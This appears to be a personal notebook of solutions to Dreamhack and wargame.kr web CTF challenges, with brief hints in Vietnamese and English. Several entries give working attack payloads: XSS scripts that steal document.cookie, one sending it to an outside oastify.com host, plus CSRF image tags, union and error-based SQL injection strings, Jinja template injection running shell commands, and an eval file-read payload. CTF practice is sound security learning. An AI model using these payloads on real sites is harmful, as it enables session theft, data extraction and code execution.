# Dreamhack Web level 1
#### 1. devtools-sources
#### 2. cookie
#### 3. command-injection-1
#### 4. pathtraversal
#### 5. file-download-1
#### 6. Carve Party
#### 7. ex-reg-ex
#### 8. phpreg
dnynyangang0310
0@00319!+1+13
#### 9. Flying Chars
#### 10. 🌱 simple-web-request
#### 11. session
#### 12. web-misconf-1
#### 13. php7cmp4re
Mã ascii
https://ko.calc-site.com/bases/ascii
ip1:
* 8 - 56
* 7.A - 55 46 65
* 7.9 - 55 46 57
* 7.: - 55 46 58
ip2:
* 2 ký tự
* 74 - 55 52
* chr("74") - J
* 7K
#### 14. xss-1
`<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>`
#### 15. session-basic
#### 16. simple_sqli
#### 17. xss-2
`<img src="x" onerror="location.href='http://127.0.0.1:8000/memo?memo='+document.cookie;">`
#### 18. csrf-1
`<img src=/admin/notice_flag?userid=admin>`
#### 19. csrf-2
guest:guest
`<img src="/change_password?pw=admin">`
login admin:admin
#### 20. simple-ssti
#### 21. image-storage
#### 22. simple_sqli_chatgpt
#### 23. XSS Filtering Bypass
`<sscriptcript>alert('XSS')</sscriptcript>`
```
<Script>alert(1)</Script>
```
`<Script>locatioonn.href="http://127.0.0.1:8000/memo?memo="+document.cookie;</Script>`
#### 24. proxy-1
#### 25. php-1
#### 26. command-injection-chatgpt
#### 27. Base64 based
#### 28. error based sql injection
```
AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -
AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -
```
```
' AND extractvalue(1, concat(0x7e, substring((SELECT upw FROM user WHERE uid='admin'),1,20),0x7e))--
' AND extractvalue(1, concat(0x7e, substring((SELECT upw FROM user WHERE uid='admin'),20,50),0x7e))--
```
#### 29. sql injection bypass WAF
%09 - TAB (\t - Horizontal Tab)
```
'Union Select idx,uid,upw From user where uid="Admin"#
'Union Select null,idx,upw From user where uid="Admin"#
```
`'Union Select 1,upw,3 From user where uid="Admin"#`
#### 30. baby-union
Tìm vị trí có thể chèn
Tìm tên bảng CSDL, tìm được bảng onlyflag
```
uid=admin&upw=apple'union select table_name,2,3,4 from information_schema.tables#
```
Tìm cột trong bảng onlyflag
```
uid=admin&upw=apple'union select column_name,2,3,4 from information_schema.columns where table_name='onlyflag'
```
Lấy flag
#### 31. CSRF Advanced
/login:
* username - admin
* request.remote_addr - 127.0.0.1
`<img src="/change_password?pw=admin&csrftoken=7505b9c72ab4aa94b1a4ed7b207b67fb">`
login admin:admin
#### 32. Command Injection Advanced
curl link and save to folder cache
https only using shell github
#### 33. [wargame.kr] login filtering
trim: If there are spaces in the input value, remove them.
mysqli_real_escape_string: This is an escaping to prevent SQL injection. (Escape special characters (e.g., ', ", \, NULL) by adding a backslash ( \) in front of them.) However, this function can be bypassed depending on logical vulnerabilities or other DB settings.
In PHP, "Guest" != "guest" is not blocked. → Blocking bypass succeeded.
However, MySQL queries can successfully log in by judging the equality regardless of case .
#### 34. [wargame.kr] strcmp
The strcmp written in the problem is a function that compares strings.
If A<B, then negative value
If A>B, then positive value
If A=B, return 0
Since I don't know of any vulnerabilities related to PHP, I looked it up on Google and found that in certain versions of PHP, if you input an array as an argument to strcmp(), NULL is returned.
Also, it is said that PHP returns True when comparing NULL and 0 with ==.
Therefore, modify the highlighted password part above into an array like password[].
#### 35. what-is-my-ip
#### 36. simple-phparse
#### 37. File Vulnerability Advanced for linux
#### 38. Apache htaccess
#### 39. BypassIF
#### 40. NoSQL-CouchDB
#### 41. Type c-j
#### 42. random-test
#### 43. [wargame.kr] tmitter
create account and user name have max 33 character
admin a:12345678
login
#### 44. out of money
borrow 2000
change to DHC
I used the DHC coins I had as collateral on the /dream page.
I tried borrowing 1000 DHD coins 3 times using that collateral.
I went back to the /santa page and converted the borrowed DHD coins into DHH coins.
To eliminate the debt, I entered -2000 in the DHH borrowing input box to eliminate the debt.
Finally buy flag
#### 45. mongoboard
https://www.mongodb.com/docs/manual/reference/method/ObjectId/
ObjectId = TimeStamp(4 byte) + Machine ID (3 byte) + Process ID (2 byte) + Counter (3 byte)
| # | ObjectId | Timestamp (4 byte)| Machine ID (3 byte) | PID (2 byte) | Counter (3 byte) | UTC | Title | User |
| - | -------- | ----------------- | ------------------- | ------------ | ---------------- | --- | ----- | ---- |
| 1 | `68cc1272c815361c46547dbf` | `68cc1272` → 1756502450 | `c81536` | `1c46` | `547dbf` | 2025-09-18 14:08:50 | Hello | guest |
| 2 | `68cc1277c815361c46547dc0` | `68cc1277` → 1756502455 | `c81536` | `1c46` | `547dc0` | 2025-09-18 14:08:55 | Mongo | guest |
| 3 |`68cc127ac815361c46547dc1` | `68cc127a` → 1756502458 | `c81536` | `1c46` |`547dc1` | 2025-09-18 14:08:58 | FLAG | admin |
| 4 | `68cc127bc815361c46547dc2` | `68cc127b` → 1756502459 | `c81536` | `1c46` |`547dc2` | 2025-09-18 14:08:59 | Good | guest |
-> Counter admin = 547dc1
-> Timestamp = between 68cc1277 and 68cc127b
| publish_date | Epoch | Hex (big-endian) |
| -------------| ------| ---------------- |
| 2025-09-18 14:08:55Z | **1756502455** | `0x68cc1277`|
| 2025-09-18 14:08:58Z | **1756502458** | `0x68cc127a`|
-> id: 68cc1277c815361c46547dc1
#### 46. [wargame.kr] fly me to the moon
using https://beautifier.io/
#### 47. amocafe
#### 48. Broken Buffalo Wings
#### 49. [wargame.kr] type confusion
ANY VALUE WHICH WE INPUT WILL BE DECODED TO JSON OBJECT (EXP: {"key":"test"} → key=>test ) .ON THE ORDER HAND, THIS CHALLENGE FORCES US TO INPUT A JSON STRING WITH FORM {"key":blabla}, base error form ==, not comepare type of data
#### 50. baby-Case
#### 51. Click me!
when hover the button move to another location
#### 52. Pearfect Markdown
include()
#### 53. Ctrl-C
#### 54. Test Your Luck
#### 55. baby-ai
#### 56. access-log
look like sqli blind, find with !=
it change the position to find the flag
68 72 123 97 110 65 49 121 122 49 110 71 86 101 51 121 66 49 57 76 48 103 125
#### 57. Where-is-localhost
block ipv4 so i using ipv6
#### 58. Simple Note Manager
#### 59. [wargame.kr] already got
#### 60. My Best Friend
#### 61.
just remove charactor
#### 62. Hangul - Revenge
unicodedata.normalize("NFKC", message)
If you look at this part, you can see that the message value received as input is normalized to Unicode.
using full-width characters
https://dencode.com/en/string/character-width
{{7*7}}
{{config.items()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
#### 63. Logical
uname can be empty and query return list empty
condition return just check the uname == name so just use empty uname and random password
#### 64. Dream Badge
#### 65. Really Not SQL
we can use another method like PUT
we can upload file to /var/www/html/user, so we can change password user admin
now we can login by admin:admin
to get flag we need the session user admin, i save the cookie and use to get the flag
or we can using curl -T can upload shell to /user, this method may be quicker
#### 66. ez_race
to get flag, we need key
key is random 1-100 and if wrong gen new key, we have to guess one number from 1 to 100 within 3 seconds
#### 67. Find Real One
https://dreamhack-media.s3.amazonaws.com/attachments/4ecde3bf99e2bd81a9777797ded0186461c21492e729a2ba48c571fdf9b767bc.png
#### 68. iwanttoeatcookie
#### 69. Disgusting Ads
a lot of request to /hb was send
we need to disable javascript
Go to settings and block the use of Java Script.
#### 70. Tartar sauce
save file in /app/flag like the docker file
#### 71. Copy And Paste
take a screen capture and send to chatgpt to get flag
DH{de5d5d08e9818f5336657fef949399f9deef120465f7de60df9eeefe99e9e4d85e886f1999ed0ee9189357ed46fd0e32f072f24fd951483797510e9d33e0df66f8d00257fd3e47fe816d30e4883747d44805fd3e6dff65dddefe2d427e4ede28186e931e41d7f04ef83f05804d88de1ee17fd4ee4ed0eeedd36071889f41fde2071dd4f631d044428fe66d150d411f7962e2eeeee9d8d94f6fef4d3d4ddde85fe06e25fdfdf3e39f03e89d2ee1e475065594879f8103de4d1dd82e442df06750e886fd0471e0599d}
We recommend that you analyze the DejaVuSans.ttf file given in the problem file using FontForge
#### 72. 이발
we can upload file txt
__import__('os').popen('cat ../flag.txt').read()
the flag save in ../flag.txt
eval() can do the code in file txt
login "admin": "adminpass"
upload file test.txt
#### 73. Safe CSP
login by account user:pass
check code in real_url, we can change cookie to admin
If you enter test and make a request, the entered value is included in the text parameter and the entered value and the encrypted value are printed below.
Check /debug router path also attempts to use the cookie as a flag value through the param parameter.
If you look at the source code of the logout section and the source code that adds CSP to the response header section, you can see that the Nonce value continues to appear in the response header and is reused until you log out, so you can get the cookie value using the script tag by reusing the Nonce value.
Since the cookie value is set to the flag value in the /debug path by checking the nonce value below, you can create an XSS payload using the script tag via the param parameter.
Let craft a request
```
<script+nonce='AAAAAPLLqsY='>document.location='http://ukiyahuywcfl0nvo7efeef4pwg27qxem.oastify.com/c?cookie='%2bdocument.cookie</script>
```
#### 74. DreamDocs
when access to internal doc have 2 respone
first can see the doc
second respone 404
flag_doc_id is random (100, 999)
user_level check via X-User
Just brute force and change X-User to admin
Sign in with Wallet
Connect another wallet